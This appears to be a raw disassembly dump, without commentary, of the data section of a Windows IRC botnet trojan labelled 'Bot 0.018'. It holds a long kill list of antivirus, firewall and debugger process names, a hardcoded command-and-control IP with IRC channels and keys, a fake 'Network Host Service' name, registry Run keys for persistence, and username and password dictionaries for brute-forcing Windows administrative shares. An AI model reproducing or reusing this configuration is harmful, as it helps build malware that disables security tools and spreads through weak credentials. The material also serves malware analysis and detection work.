dd offset aLuspt_exe ; "LUSPT.EXE"
dd offset aMapisvc32_exe ; "MAPISVC32.EXE"
dd offset aMcagent_exe ; "MCAGENT.EXE"
dd offset aMcmnhdlr_exe ; "MCMNHDLR.EXE"
dd offset aMcshield_exe ; "MCSHIELD.EXE"
dd offset aMctool_exe ; "MCTOOL.EXE"
dd offset aMcupdate_exe ; "MCUPDATE.EXE"
dd offset aMcupdate_exe ; "MCUPDATE.EXE"
dd offset aMcvsrte_exe ; "MCVSRTE.EXE"
dd offset aMcvsshld_exe ; "MCVSSHLD.EXE"
dd offset aMd_exe ; "MD.EXE"
dd offset aMfin32_exe ; "MFIN32.EXE"
dd offset aMfw2en_exe ; "MFW2EN.EXE"
dd offset aMfweng3_02d30_ ; "MFWENG3.02D30.EXE"
dd offset aMgavrtcl_exe ; "MGAVRTCL.EXE"
dd offset aMgavrte_exe ; "MGAVRTE.EXE"
dd offset aMghtml_exe ; "MGHTML.EXE"
dd offset aMgui_exe ; "MGUI.EXE"
dd offset aMinilog_exe ; "MINILOG.EXE"
dd offset aMmod_exe ; "MMOD.EXE"
dd offset aMonitor_exe ; "MONITOR.EXE"
dd offset aMoolive_exe ; "MOOLIVE.EXE"
dd offset aMostat_exe ; "MOSTAT.EXE"
dd offset aMpfagent_exe ; "MPFAGENT.EXE"
dd offset aMpfservice_exe ; "MPFSERVICE.EXE"
dd offset aMpftray_exe ; "MPFTRAY.EXE"
dd offset aMrflux_exe ; "MRFLUX.EXE"
dd offset aMsapp_exe ; "MSAPP.EXE"
dd offset aMsbb_exe ; "MSBB.EXE"
dd offset aMsblast_exe ; "MSBLAST.EXE"
dd offset aMscache_exe ; "MSCACHE.EXE"
dd offset aMsccn32_exe ; "MSCCN32.EXE"
dd offset aMscman_exe ; "MSCMAN.EXE"
dd offset aMsconfig_exe_0 ; "MSCONFIG.EXE"
dd offset aMsdm_exe ; "MSDM.EXE"
dd offset aMsdos_exe ; "MSDOS.EXE"
dd offset aMsiexec16_exe ; "MSIEXEC16.EXE"
dd offset aMsinfo32_exe ; "MSINFO32.EXE"
dd offset aMslaugh_exe ; "MSLAUGH.EXE"
dd offset aMsmgt_exe ; "MSMGT.EXE"
dd offset aMsmsgri32_exe ; "MSMSGRI32.EXE"
dd offset aMssmmc32_exe ; "MSSMMC32.EXE"
dd offset aMssys_exe ; "MSSYS.EXE"
dd offset aMsvxd_exe ; "MSVXD.EXE"
dd offset aMu0311ad_exe ; "MU0311AD.EXE"
dd offset aMwatch_exe ; "MWATCH.EXE"
dd offset aN32scanw_exe ; "N32SCANW.EXE"
dd offset aNav_exe ; "NAV.EXE"
dd offset aAutoProtect_na ; "AUTO-PROTECT.NAV80TRY.EXE"
dd offset aNavap_navapsvc ; "NAVAP.NAVAPSVC.EXE"
dd offset aNavapsvc_exe ; "NAVAPSVC.EXE"
dd offset aNavapw32_exe ; "NAVAPW32.EXE"
dd offset aNavdx_exe ; "NAVDX.EXE"
dd offset aNavengnavex15_ ; "NAVENGNAVEX15.NAVLU32.EXE"
dd offset aNavlu32_exe ; "NAVLU32.EXE"
dd offset aNavnt_exe ; "NAVNT.EXE"
dd offset aNavstub_exe ; "NAVSTUB.EXE"
dd offset aNavw32_exe ; "NAVW32.EXE"
dd offset aNavwnt_exe ; "NAVWNT.EXE"
dd offset aNc2000_exe ; "NC2000.EXE"
dd offset aNcinst4_exe ; "NCINST4.EXE"
dd offset aNdd32_exe ; "NDD32.EXE"
dd offset aNeomonitor_exe ; "NEOMONITOR.EXE"
dd offset aNeowatchlog_ex ; "NEOWATCHLOG.EXE"
dd offset aNetarmor_exe ; "NETARMOR.EXE"
dd offset aNetd32_exe ; "NETD32.EXE"
dd offset aNetinfo_exe ; "NETINFO.EXE"
dd offset aNetmon_exe ; "NETMON.EXE"
dd offset aNetscanpro_exe ; "NETSCANPRO.EXE"
dd offset aNetspyhunter1_ ; "NETSPYHUNTER-1.2.EXE"
dd offset aNetstat_exe ; "NETSTAT.EXE"
dd offset aNetutils_exe ; "NETUTILS.EXE"
dd offset aNisserv_exe ; "NISSERV.EXE"
dd offset aNisum_exe ; "NISUM.EXE"
dd offset aNmain_exe ; "NMAIN.EXE"
dd offset aNod32_exe ; "NOD32.EXE"
dd offset aNormist_exe ; "NORMIST.EXE"
dd offset aNorton_interne ; "NORTON_INTERNET_SECU_3.0_407.EXE"
dd offset aNotstart_exe ; "NOTSTART.EXE"
dd offset aNpf40_tw_98_nt ; "NPF40_TW_98_NT_ME_2K.EXE"
dd offset aNpfmessenger_e ; "NPFMESSENGER.EXE"
dd offset aNprotect_exe ; "NPROTECT.EXE"
dd offset aNpscheck_exe ; "NPSCHECK.EXE"
dd offset aNpssvc_exe ; "NPSSVC.EXE"
dd offset aNsched32_exe ; "NSCHED32.EXE"
dd offset aNssys32_exe ; "NSSYS32.EXE"
dd offset aNstask32_exe ; "NSTASK32.EXE"
dd offset aNsupdate_exe ; "NSUPDATE.EXE"
dd offset aNt_exe ; "NT.EXE"
dd offset aNtrtscan_exe ; "NTRTSCAN.EXE"
dd offset aNtvdm_exe ; "NTVDM.EXE"
dd offset aNtxconfig_exe ; "NTXconfig.EXE"
dd offset aNui_exe ; "NUI.EXE"
dd offset aNupgrade_exe ; "NUPGRADE.EXE"
dd offset aNupgrade_exe ; "NUPGRADE.EXE"
dd offset aNvarch16_exe ; "NVARCH16.EXE"
dd offset aNvc95_exe ; "NVC95.EXE"
dd offset aNvsvc32_exe ; "NVSVC32.EXE"
dd offset aNwinst4_exe ; "NWINST4.EXE"
dd offset aNwservice_exe ; "NWSERVICE.EXE"
dd offset aNwtool16_exe ; "NWTOOL16.EXE"
dd offset aOllydbg_exe ; "OLLYDBG.EXE"
dd offset aOnsrvr_exe ; "ONSRVR.EXE"
dd offset aOptimize_exe ; "OPTIMIZE.EXE"
dd offset aOstronet_exe ; "OSTRONET.EXE"
dd offset aOtfix_exe ; "OTFIX.EXE"
dd offset aOutpost_exe ; "OUTPOST.EXE"
dd offset aOutpost_exe ; "OUTPOST.EXE"
dd offset aOutpostinstall ; "OUTPOSTINSTALL.EXE"
dd offset aOutpostproinst ; "OUTPOSTPROINSTALL.EXE"
dd offset aPadmin_exe ; "PADMIN.EXE"
dd offset aPanixk_exe ; "PANIXK.EXE"
dd offset aPatch_exe ; "PATCH.EXE"
dd offset aPavcl_exe ; "PAVCL.EXE"
dd offset aPavproxy_exe ; "PAVPROXY.EXE"
dd offset aPavsched_exe ; "PAVSCHED.EXE"
dd offset aPavw_exe ; "PAVW.EXE"
dd offset aPcc2002s902_ex ; "PCC2002S902.EXE"
dd offset aPcc2k_76_1436_ ; "PCC2K_76_1436.EXE"
dd offset aPcciomon_exe ; "PCCIOMON.EXE"
dd offset aPccntmon_exe ; "PCCNTMON.EXE"
dd offset aPccwin97_exe ; "PCCWIN97.EXE"
dd offset aPccwin98_exe ; "PCCWIN98.EXE"
dd offset aPcdsetup_exe ; "PCDSETUP.EXE"
dd offset aPcfwallicon_ex ; "PCFWALLICON.EXE"
dd offset aPcip10117_0_ex ; "PCIP10117_0.EXE"
dd offset aPcscan_exe ; "PCSCAN.EXE"
dd offset aPdsetup_exe ; "PDSETUP.EXE"
dd offset aPenis_exe ; "PENIS.EXE"
dd offset aPeriscope_exe ; "PERISCOPE.EXE"
dd offset aPersfw_exe ; "PERSFW.EXE"
dd offset aPerswf_exe ; "PERSWF.EXE"
dd offset aPf2_exe ; "PF2.EXE"
dd offset aPfwadmin_exe ; "PFWADMIN.EXE"
dd offset aPgmonitr_exe ; "PGMONITR.EXE"
dd offset aPingscan_exe ; "PINGSCAN.EXE"
dd offset aPlatin_exe ; "PLATIN.EXE"
dd offset aPop3trap_exe ; "POP3TRAP.EXE"
dd offset aPoproxy_exe ; "POPROXY.EXE"
dd offset aPopscan_exe ; "POPSCAN.EXE"
dd offset aPortdetective_ ; "PORTDETECTIVE.EXE"
dd offset aPortmonitor_ex ; "PORTMONITOR.EXE"
dd offset aPowerscan_exe ; "POWERSCAN.EXE"
dd offset aPpinupdt_exe ; "PPINUPDT.EXE"
dd offset aPptbc_exe ; "PPTBC.EXE"
dd offset aPpvstop_exe ; "PPVSTOP.EXE"
dd offset aPrizesurfer_ex ; "PRIZESURFER.EXE"
dd offset aPrmt_exe ; "PRMT.EXE"
dd offset aPrmvr_exe ; "PRMVR.EXE"
dd offset aProcdump_exe ; "PROCDUMP.EXE"
dd offset aProcessmonitor ; "PROCESSMONITOR.EXE"
dd offset aProcexplorerv1 ; "PROCEXPLORERV1.0.EXE"
dd offset aProgramauditor ; "PROGRAMAUDITOR.EXE"
dd offset aProport_exe ; "PROPORT.EXE"
dd offset aProtectx_exe ; "PROTECTX.EXE"
dd offset aPspf_exe ; "PSPF.EXE"
dd offset aPurge_exe ; "PURGE.EXE"
dd offset aPussy_exe ; "PUSSY.EXE"
dd offset aPview95_exe ; "PVIEW95.EXE"
dd offset aQconsole_exe ; "QCONSOLE.EXE"
dd offset aQserver_exe ; "QSERVER.EXE"
dd offset aRapapp_exe ; "RAPAPP.EXE"
dd offset aRav7_exe ; "RAV7.EXE"
dd offset aRav7win_exe ; "RAV7WIN.EXE"
dd offset aRav8win32eng_e ; "RAV8WIN32ENG.EXE"
dd offset aRay_exe ; "RAY.EXE"
dd offset aRb32_exe ; "RB32.EXE"
dd offset aRcsync_exe ; "RCSYNC.EXE"
dd offset aRealmon_exe ; "REALMON.EXE"
dd offset aReged_exe ; "REGED.EXE"
dd offset aRegedit_exe ; "REGEDIT.EXE"
dd offset aRegedt32_exe ; "REGEDT32.EXE"
dd offset aRescue_exe ; "RESCUE.EXE"
dd offset aRescue32_exe ; "RESCUE32.EXE"
dd offset aRrguard_exe ; "RRGUARD.EXE"
dd offset aRshell_exe ; "RSHELL.EXE"
dd offset aRtvscan_exe ; "RTVSCAN.EXE"
dd offset aRtvscn95_exe ; "RTVSCN95.EXE"
dd offset aRulaunch_exe ; "RULAUNCH.EXE"
dd offset aRun32dll_exe ; "RUN32DLL.EXE"
dd offset aRundll_exe ; "RUNDLL.EXE"
dd offset aRundll16_exe ; "RUNDLL16.EXE"
dd offset aRuxdll32_exe ; "RUXDLL32.EXE"
dd offset aSafeweb_exe ; "SAFEWEB.EXE"
dd offset aSahagent_exe ; "SAHAGENT.EXE"
dd offset aSave_exe ; "SAVE.EXE"
dd offset aSavenow_exe ; "SAVENOW.EXE"
dd offset aSbserv_exe ; "SBSERV.EXE"
dd offset aSc_exe ; "SC.EXE"
dd offset aScam32_exe ; "SCAM32.EXE"
dd offset aScan32_exe ; "SCAN32.EXE"
dd offset aScan95_exe ; "SCAN95.EXE"
dd offset aScanpm_exe ; "SCANPM.EXE"
dd offset aScrscan_exe ; "SCRSCAN.EXE"
dd offset aScrsvr_exe ; "SCRSVR.EXE"
dd offset aScvhost_exe ; "SCVHOST.EXE"
dd offset aSd_exe ; "SD.EXE"
dd offset aServ95_exe ; "SERV95.EXE"
dd offset aService_exe ; "SERVICE.EXE"
dd offset aServlce_exe ; "SERVLCE.EXE"
dd offset aServlces_exe ; "SERVLCES.EXE"
dd offset aSetupvameeval_ ; "SETUPVAMEEVAL.EXE"
dd offset aSetup_flowprot ; "SETUP_FLOWPROTECTOR_US.EXE"
dd offset aSfc_exe ; "SFC.EXE"
dd offset aSgssfw32_exe ; "SGSSFW32.EXE"
dd offset aSh_exe ; "SH.EXE"
dd offset aShellspyinstal ; "SHELLSPYINSTALL.EXE"
dd offset aShn_exe ; "SHN.EXE"
dd offset aShowbehind_exe ; "SHOWBEHIND.EXE"
dd offset aSmc_exe ; "SMC.EXE"
dd offset aSms_exe ; "SMS.EXE"
dd offset aSmss32_exe ; "SMSS32.EXE"
dd offset aSoap_exe ; "SOAP.EXE"
dd offset aSofi_exe ; "SOFI.EXE"
dd offset aSperm_exe ; "SPERM.EXE"
dd offset aSpf_exe ; "SPF.EXE"
dd offset aSphinx_exe ; "SPHINX.EXE"
dd offset aSpoler_exe ; "SPOLER.EXE"
dd offset aSpoolcv_exe ; "SPOOLCV.EXE"
dd offset aSpoolsv32_exe ; "SPOOLSV32.EXE"
dd offset aSpyxx_exe ; "SPYXX.EXE"
dd offset aSrexe_exe ; "SREXE.EXE"
dd offset aSrng_exe ; "SRNG.EXE"
dd offset aSs3edit_exe ; "SS3EDIT.EXE"
dd offset aSsgrate_exe ; "SSGRATE.EXE"
dd offset aSsg_4104_exe ; "SSG_4104.EXE"
dd offset aSt2_exe ; "ST2.EXE"
dd offset aStart_exe ; "START.EXE"
dd offset aStcloader_exe ; "STCLOADER.EXE"
dd offset aSupftrl_exe ; "SUPFTRL.EXE"
dd offset aSupport_exe ; "SUPPORT.EXE"
dd offset aSupporter5_exe ; "SUPPORTER5.EXE"
dd offset aSvc_exe ; "SVC.EXE"
dd offset aSvchostc_exe ; "SVCHOSTC.EXE"
dd offset aSvchosts_exe ; "SVCHOSTS.EXE"
dd offset aSvshost_exe ; "SVSHOST.EXE"
dd offset aSvshost32_exe ; "SVSHOST32.EXE"
dd offset aUpd32_exe ; "UPD32.EXE"
dd offset aSweep95_exe ; "SWEEP95.EXE"
dd offset aSweepnet_sweep ; "SWEEPNET.SWEEPSRV.SYS.SWNETSUP.EXE"
dd offset aSymproxysvc_ex ; "SYMPROXYSVC.EXE"
dd offset aSymtray_exe ; "SYMTRAY.EXE"
dd offset aSysedit_exe ; "SYSEDIT.EXE"
dd offset aSystem_exe ; "SYSTEM.EXE"
dd offset aSystem32_exe ; "SYSTEM32.EXE"
dd offset aSysupd_exe ; "SYSUPD.EXE"
dd offset aTaskmg_exe ; "TASKMG.EXE"
dd offset aTaskmo_exe ; "TASKMO.EXE"
dd offset aTaskmon_exe ; "TASKMON.EXE"
dd offset aTaumon_exe ; "TAUMON.EXE"
dd offset aTbscan_exe ; "TBSCAN.EXE"
dd offset aTc_exe ; "TC.EXE"
dd offset aTca_exe ; "TCA.EXE"
dd offset aTcm_exe ; "TCM.EXE"
dd offset aTds3_exe ; "TDS-3.EXE"
dd offset aTds298_exe ; "TDS2-98.EXE"
dd offset aTds2Nt_exe ; "TDS2-NT.EXE"
dd offset aTeekids_exe ; "TEEKIDS.EXE"
dd offset aTfak_exe ; "TFAK.EXE"
dd offset aTfak5_exe ; "TFAK5.EXE"
dd offset aTgbob_exe ; "TGBOB.EXE"
dd offset aTitanin_exe ; "TITANIN.EXE"
dd offset aTitaninxp_exe ; "TITANINXP.EXE"
dd offset aTracert_exe ; "TRACERT.EXE"
dd offset aTrickler_exe ; "TRICKLER.EXE"
dd offset aTrjscan_exe ; "TRJSCAN.EXE"
dd offset aTrjsetup_exe ; "TRJSETUP.EXE"
dd offset aTrojantrap3_ex ; "TROJANTRAP3.EXE"
dd offset aTsadbot_exe ; "TSADBOT.EXE"
dd offset aTvmd_exe ; "TVMD.EXE"
dd offset aTvtmd_exe ; "TVTMD.EXE"
dd offset aUndoboot_exe ; "UNDOBOOT.EXE"
dd offset aUpdat_exe ; "UPDAT.EXE"
dd offset aUpdate_exe ; "UPDATE.EXE"
dd offset aUpdate_exe ; "UPDATE.EXE"
dd offset aUpgrad_exe ; "UPGRAD.EXE"
dd offset aUtpost_exe ; "UTPOST.EXE"
dd offset aVbcmserv_exe ; "VBCMSERV.EXE"
dd offset aVbcons_exe ; "VBCONS.EXE"
dd offset aVbust_exe ; "VBUST.EXE"
dd offset aVbwin9x_exe ; "VBWIN9X.EXE"
dd offset aVbwinntw_exe ; "VBWINNTW.EXE"
dd offset aVcsetup_exe ; "VCSETUP.EXE"
dd offset aVet32_exe ; "VET32.EXE"
dd offset aVet95_exe ; "VET95.EXE"
dd offset aVettray_exe ; "VETTRAY.EXE"
dd offset aVfsetup_exe ; "VFSETUP.EXE"
dd offset aVirHelp_exe ; "VIR-HELP.EXE"
dd offset aVirusmdpersona ; "VIRUSMDPERSONALFIREWALL.EXE"
dd offset aVnlan300_exe ; "VNLAN300.EXE"
dd offset aVnpc3000_exe ; "VNPC3000.EXE"
dd offset aVpc32_exe ; "VPC32.EXE"
dd offset aVpc42_exe ; "VPC42.EXE"
dd offset aVpfw30s_exe ; "VPFW30S.EXE"
dd offset aVptray_exe ; "VPTRAY.EXE"
dd offset aVscan40_exe ; "VSCAN40.EXE"
dd offset aVscenu6_02d30_ ; "VSCENU6.02D30.EXE"
dd offset aVsched_exe ; "VSCHED.EXE"
dd offset aVsecomr_exe ; "VSECOMR.EXE"
dd offset aVshwin32_exe ; "VSHWIN32.EXE"
dd offset aVsisetup_exe ; "VSISETUP.EXE"
dd offset aVsmain_exe ; "VSMAIN.EXE"
dd offset aVsmon_exe ; "VSMON.EXE"
dd offset aVsstat_exe ; "VSSTAT.EXE"
dd offset aVswin9xe_exe ; "VSWIN9XE.EXE"
dd offset aVswinntse_exe ; "VSWINNTSE.EXE"
dd offset aVswinperse_exe ; "VSWINPERSE.EXE"
dd offset aW32dsm89_exe ; "W32DSM89.EXE"
dd offset aW9x_exe ; "W9X.EXE"
dd offset aWatchdog_exe ; "WATCHDOG.EXE"
dd offset aWebdav_exe ; "WEBDAV.EXE"
dd offset aWebscanx_exe ; "WEBSCANX.EXE"
dd offset aWebtrap_exe ; "WEBTRAP.EXE"
dd offset aWfindv32_exe ; "WFINDV32.EXE"
dd offset aWgfe95_exe ; "WGFE95.EXE"
dd offset aWhoswatchingme ; "WHOSWATCHINGME.EXE"
dd offset aWimmun32_exe ; "WIMMUN32.EXE"
dd offset aWinBugsfix_exe ; "WIN-BUGSFIX.EXE"
dd offset aWin32_exe ; "WIN32.EXE"
dd offset aWin32us_exe ; "WIN32US.EXE"
dd offset aWinactive_exe ; "WINACTIVE.EXE"
dd offset aWindow_exe ; "WINDOW.EXE"
dd offset aWindows_exe ; "WINDOWS.EXE"
dd offset aWininetd_exe ; "WININETD.EXE"
dd offset aWininit_exe ; "WININIT.EXE"
dd offset aWininitx_exe ; "WININITX.EXE"
dd offset aWinlogin_exe ; "WINLOGIN.EXE"
dd offset aWinmain_exe ; "WINMAIN.EXE"
dd offset aWinnet_exe ; "WINNET.EXE"
dd offset aWinppr32_exe ; "WINPPR32.EXE"
dd offset aWinrecon_exe ; "WINRECON.EXE"
dd offset aWinservn_exe ; "WINSERVN.EXE"
dd offset aWinssk32_exe ; "WINSSK32.EXE"
dd offset aWinstart_exe ; "WINSTART.EXE"
dd offset aWinstart001_ex ; "WINSTART001.EXE"
dd offset aWintsk32_exe ; "WINTSK32.EXE"
dd offset aWinupdate_exe ; "WINUPDATE.EXE"
dd offset aWkufind_exe ; "WKUFIND.EXE"
dd offset aWnad_exe ; "WNAD.EXE"
dd offset aWnt_exe ; "WNT.EXE"
dd offset aWradmin_exe ; "WRADMIN.EXE"
dd offset aWrctrl_exe ; "WRCTRL.EXE"
dd offset aWsbgate_exe ; "WSBGATE.EXE"
dd offset aWupdater_exe ; "WUPDATER.EXE"
dd offset aWupdt_exe ; "WUPDT.EXE"
dd offset aWyvernworksfir ; "WYVERNWORKSFIREWALL.EXE"
dd offset aXpf202en_exe ; "XPF202EN.EXE"
dd offset aZapro_exe ; "ZAPRO.EXE"
dd offset aZapsetup3001_e ; "ZAPSETUP3001.EXE"
dd offset aZatutor_exe ; "ZATUTOR.EXE"
dd offset aZonalm2601_exe ; "ZONALM2601.EXE"
dd offset aZonealarm_exe ; "ZONEALARM.EXE"
dd offset a_avp32_exe ; "_AVP32.EXE"
dd offset a_avpcc_exe ; "_AVPCC.EXE"
dd offset a_avpm_exe ; "_AVPM.EXE"
dd offset aHijackthis_exe ; "HIJACKTHIS.EXE"
dd offset aFAgobot_exe ; "F-AGOBOT.EXE"
dd offset aPandaavengine_ ; "PandaAVEngine.exe"
dd offset aSysinfo_exe ; "sysinfo.exe"
dd offset aMscvb32_exe ; "mscvb32.exe"
dd offset aPenis32_exe ; "Penis32.exe"
dd offset aBbeagle_exe ; "bbeagle.exe"
dd offset aSysmonxp_exe ; "SysMonXP.exe"
dd offset aWinupd_exe ; "winupd.exe"
dd offset aWinsys_exe ; "winsys.exe"
dd offset aSsate_exe ; "ssate.exe"
dd offset aRate_exe ; "rate.exe"
dd offset aD3dupdate_exe ; "d3dupdate.exe"
dd offset aIrun4_exe ; "irun4.exe"
dd offset aI11r54n4_exe ; "i11r54n4.exe"
dd offset aMsconfig_exe ; "MsConfiG.exe"
dd offset aWuanclt_exe ; "WUANCLT.EXE"
dd offset aWuacrlt_exe ; "WUACRLT.EXE"
dd offset aWruaclt_exe ; "WRUACLT.EXE"
dd offset aWinssv_exe ; "winssv.exe"
dd offset aScguard_exe ; "scguard.exe"
dd offset aWuamgrd_exe ; "wuamgrd.exe"
dd offset aBling_exe ; "bling.exe"
dd offset aWinmp_exe ; "winmp.exe"
dd offset aHass_exe ; "hass.exe"
dword_42AE38 dd 1BBh ; sub_40D1EF+4C2�r
dword_42AE3C dd 1BBh dword_42AE40 dd 4DBh dword_42AE44 dd 45h ; sub_4078FA+3D89�r
dword_42AE48 dd 4E20h ; sub_4078FA:loc_40B783�r
dword_42AE4C dd 201h dword_42AE50 dd 1 dword_42AE54 dd 1 dword_42AE58 dd 1 ; sub_40D1EF:loc_40D522�r
byte_42AE5C db 2Eh ; DATA XREF: sub_401EE9:loc_401EF5�r
; sub_4078FA+7A7�r ...
align 10h
dword_42AE60 dd 6 ; sub_40E495+51�r ...
dword_42AE64 dd 1 ; sub_4078FA+260�r ...
dword_42AE68 dd 1 ; sub_4078FA+25A�r
aBot018 db 'Bot018',0 ; DATA XREF: sub_4078FA+2BD7�o
; sub_4078FA:loc_40C01E�o ...
align 4
aBot0_018 db '[Bot 0.018]',0 ; DATA XREF: sub_4078FA:loc_40C39D�o
aN3m3s1s db 'n3m3s1s',0 ; DATA XREF: sub_4078FA+4430�o
; sub_4078FA+573E�o ...
a217_170_244_2 db '217.170.244.2',0 ; DATA XREF: sub_40D1EF+3FA�o
; sub_40D1EF+4B3�o
align 4
aHell db '#hell',0 ; DATA XREF: sub_40D1EF+416�o
; sub_40D1EF+4C9�o
align 10h
aTroopers db 'troopers',0 ; DATA XREF: sub_40D1EF+42D�o
; sub_40D1EF+4DB�o
align 4
byte_42AEAC db 38h ; DATA XREF: sub_40D1EF:loc_40D6E0�r
; sub_40D1EF+4FF�o
db 32h, 2Eh, 31h
dd 362E3431h, 35322E34h, 31h
dword_42AEBC dd 6C656823h, 6ChaTroopers_0 db 'troopers',0 ; DATA XREF: sub_40D1EF+527�o
align 10h
byte_42AED0 db 6Dh ; DATA XREF: sub_401141+63�o
; sub_401141+18E�o ...
db 73h, 6Dh, 6Eh
dd 33747261h, 78652E32h, 65h, 2E79656Bh, 747874h
aNetworkHostSer db 'Network Host Service',0 ; DATA XREF: sub_401E73+B�o
align 10h
aSoul db '[SOUL]',0 ; DATA XREF: sub_40E495+12�o
align 4
aSysconfig_dat db 'sysconfig.dat',0
align 4
aIx db '+ix',0 ; DATA XREF: sub_4078FA+58BD�o
aMurders db '#murders',0 ; DATA XREF: sub_4078FA+3BD2�o
; sub_4078FA+55B8�o
align 4
aHell_1 db '#hell',0
align 10h
aSniffing db '#sniffing',0
align 4
off_42AF3C dd offset a@celestial_org ; DATA XREF: sub_4078FA+57BC�r
; "*@celestial.org"
off_42AF40 dd offset aMircV6_12Khale ; DATA XREF: sub_4078FA+929�r
; "mIRC v6.12 Khaled Mardam-Bey"
dword_42AF44 dd 2E373132h, 2E303731h, 2E343432h, 32hdword_42AF54 dd 15h aSoftwareMicr_0 db 'Software\Microsoft\Windows\CurrentVersion\Run',0
; DATA XREF: .data:off_42A354�o
align 4
db 53h
aOftwareMicroso db 'oftware\Microsoft\Windows\CurrentVersion\RunServices',0
align 10h
aSoftwareMicros db 'Software\Microsoft\OLE',0 ; DATA XREF: sub_40E9C5+23�o
; sub_40ECEC+23�o
align 4
aSystemCurrentc db 'SYSTEM\CurrentControlSet\Control\Lsa',0 ; DATA XREF: sub_40E9C5+D5�o
; sub_40ECEC+D5�o
align 10h
dd offset aAdministrato_0 ; "administrator"
dd offset aAdministrador ; "administrador"
dd offset aAdministrateur ; "administrateur"
dd offset aAdministrat ; "administrat"
dd offset aAdmins ; "admins"
dd offset aAdmin ; "admin"
dd offset aStaff ; "staff"
dd offset aRoot ; "root"
dd offset aComputer ; "computer"
dd offset aOwner ; "owner"
dd offset aStudent ; "student"
dd offset aTeacher ; "teacher"
dd offset aWwwadmin ; "wwwadmin"
dd offset aGuest_0 ; "guest"
dd offset aDefault ; "default"
dd offset aDatabase ; "database"
dd offset aDba ; "dba"
dd offset aOracle ; "oracle"
dd offset aDb2 ; "db2"
align 10h
dword_42B050 dd 41FA76h ; .text:0041285D�o ...
dd offset aAdministrato_0 ; "administrator"
dd offset aAdministrador ; "administrador"
dd offset aAdministrateur ; "administrateur"
dd offset aAdministrat ; "administrat"
dd offset aAdmins ; "admins"
dd offset aAdmin ; "admin"
dd offset aAdm ; "adm"
dd offset aPassword1 ; "password1"
dd offset aPassword ; "password"
dd offset aPasswd ; "passwd"
dd offset aPass1234 ; "pass1234"
dd offset aPass_0 ; "pass"
dd offset aPwd ; "pwd"
dd offset a007 ; "007"
dd offset a1 ; "1"
dd offset a12 ; "12"
dd offset a123 ; "123"
dd offset a1234 ; "1234"
dd offset a12345 ; "12345"
dd offset a123456 ; "123456"
dd offset a1234567 ; "1234567"
dd offset a12345678 ; "12345678"
dd offset a123456789 ; "123456789"
dd offset a1234567890 ; "1234567890"
dd offset a2000 ; "2000"
dd offset a2001 ; "2001"
dd offset a2002 ; "2002"
dd offset a2003 ; "2003"
dd offset a2004 ; "2004"
dd offset aTest ; "test"
dd offset aGuest_0 ; "guest"
dd offset aNone ; "none"
dd offset aDemo ; "demo"
dd offset aUnix ; "unix"
dd offset aLinux ; "linux"
dd offset aChangeme ; "changeme"
dd offset aDefault ; "default"
dd offset aSystem ; "system"
dd offset aServer ; "server"
dd offset aRoot ; "root"
dd offset aNull_0 ; "null"
dd offset aQwerty ; "qwerty"
dd offset aMail ; "mail"
dd offset aOutlook ; "outlook"
dd offset aWeb ; "web"
dd offset aWww ; "www"
dd offset aInternet ; "internet"
dd offset aAccounts ; "accounts"
dd offset aAccounting ; "accounting"
dd offset aHome ; "home"
dd offset aHomeuser ; "homeuser"
dd offset aUser ; "user"
dd offset aOem ; "oem"
dd offset aOemuser ; "oemuser"
dd offset aOeminstall ; "oeminstall"
dd offset aWindows ; "windows"
dd offset aWin98 ; "win98"
dd offset aWin2k ; "win2k"
dd offset aWinxp ; "winxp"
dd offset aWinnt ; "winnt"
dd offset aWin2000 ; "win2000"
dd offset aQaz ; "qaz"
dd offset aAsd ; "asd"
dd offset aZxc ; "zxc"
dd offset aQwe ; "qwe"
dd offset aBob ; "bob"
dd offset aJen ; "jen"
dd offset aJoe ; "joe"
dd offset aFred ; "fred"
dd offset aBill ; "bill"
dd offset aMike ; "mike"
dd offset aJohn ; "john"
dd offset aPeter ; "peter"
dd offset aLuke ; "luke"
dd offset aSam ; "sam"
dd offset aSue ; "sue"
dd offset aSusan ; "susan"
dd offset aPeter ; "peter"
dd offset aBrian ; "brian"
dd offset aLee ; "lee"
dd offset aNeil ; "neil"
dd offset aIan ; "ian"
dd offset aChris ; "chris"
dd offset aEric ; "eric"
dd offset aGeorge ; "george"
dd offset aKate ; "kate"
dd offset aBob ; "bob"
dd offset aKatie ; "katie"
dd offset aMary ; "mary"
dd offset aLogin ; "login"
dd offset aLoginpass ; "loginpass"
dd offset aTechnical ; "technical"
dd offset aBackup ; "backup"
dd offset aExchange ; "exchange"
dd offset aFuck ; "fuck"
dd offset aBitch ; "bitch"
dd offset aSlut ; "slut"
dd offset aSex ; "sex"
dd offset aGod ; "god"
dd offset aHell_0 ; "hell"
dd offset aHello ; "hello"
dd offset aDomain ; "domain"
dd offset aDomainpass ; "domainpass"
dd offset aDomainpassword ; "domainpassword"
dd offset aDatabase ; "database"
dd offset aAccess ; "access"
dd offset aDbpass ; "dbpass"
dd offset aDbpassword ; "dbpassword"
dd offset aDatabasepass ; "databasepass"
dd offset aData ; "data"
dd offset aDatabasepasswo ; "databasepassword"
dd offset aDb1 ; "db1"
dd offset aDb2 ; "db2"
dd offset aDb1234 ; "db1234"
dd offset aSa ; "sa"
dd offset aSql ; "sql"
dd offset aSqlpassoainsta ; "sqlpassoainstall"
dd offset aOrainstall ; "orainstall"
dd offset aOracle ; "oracle"
dd offset aIbm ; "ibm"
dd offset aCisco ; "cisco"
dd offset aDell ; "dell"
dd offset aCompaq ; "compaq"
dd offset aSiemens ; "siemens"
dd offset aHp ; "hp"
dd offset aNokia ; "nokia"
dd offset aXp ; "xp"
dd offset aControl ; "control"
dd offset aOffice ; "office"
dd offset aBlank ; "blank"
dd offset aWinpass ; "winpass"
dd offset aMain ; "main"
dd offset aLan ; "lan"
dd offset aInternet ; "internet"
dd offset aIntranet ; "intranet"
dd offset aStudent ; "student"
dd offset aTeacher ; "teacher"
dd offset aStaff ; "staff"
align 10h
dword_42B280 dd 10h ; sub_4078FA+80A�r ...
align 8
dword_42B288 dd 736E6F63h dd 74h, 0
dword_42B294 dd 1 off_42B298 dd offset sub_40E495 ; DATA XREF: sub_40E7B0+6C�r
aLetter db 'letter',0
align 8
dd 2, 40E4F3h, 706D6F63h, 2 dup(0)
dd 3, 40E540h, 6E756F63h, 797274h, 0
dd 4, 40E5AFh, 736Fh, 2 dup(0)
dd 5, 40E624h
dword_42B2EC dd 1D4C0h off_42B2F0 dd offset aIpc ; DATA XREF: sub_40E9C5:loc_40EB7B�r
; sub_40E9C5+1C4�r ...
; "IPC$"
dword_42B2F4 dd 0 dd offset aAdmin_0 ; "ADMIN$"
align 10h
dd offset aC_3 ; "C$"
dd offset aC_2 ; "C:\\"
dd offset aD_3 ; "D$"
